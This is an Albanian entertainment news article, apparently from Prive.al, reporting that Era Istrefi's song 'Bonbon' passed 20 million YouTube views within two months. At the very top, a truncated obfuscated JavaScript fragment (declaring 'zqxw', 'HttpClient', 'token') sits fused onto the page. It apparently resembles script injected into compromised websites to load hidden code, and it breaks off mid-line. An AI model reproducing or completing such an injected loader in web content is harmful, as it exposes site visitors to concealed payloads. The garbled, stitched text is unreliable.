;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

20 milionë shikime për ‘Bonbon’

By

Ka kaluar çdo parashikim të mundshëm. Kënga ‘Bonbon’ e Era Istrefit brenda pak kohësh nga publikimi zuri vend në top lista të ndryshme botërore dhe madje arriti shifra të miliona shkarkimeve në Spotify.

I gjithë ky sukses që tashmë ka marrë dimension global natyrisht se reflektimin më të mirë të mundshëm e ka në Youtube, platforma e cila të paktën deri para kësaj jehone të ‘Bonbon’ ishte matësja e vetme e pëlqyeshmërisë së një krijimi muzikor.

Kënga tashmë ende pa mbushur dy muaj të plotë nga publikimi ka arritur shifrën e 20 milionë shikimeve.

Për të bërë një pasqyrim të thjeshtë se çfarë nënkupton kjo shifër, mjafton krahasimi me projektin paraprak, ‘Shumë pis’ që edhe pse ishte projekt tejet i suksesshëm, iu desh më shumë se dyfishi i kohës për të kapur numra të tillë.

Me këtë ritëm të Erës projekt pas projekti, do jetë interesante për t’u parë kënga e re që pason ‘Shumë pis’ e ‘Bonbon’. /Prive.al/

Artikuj të ngjashëm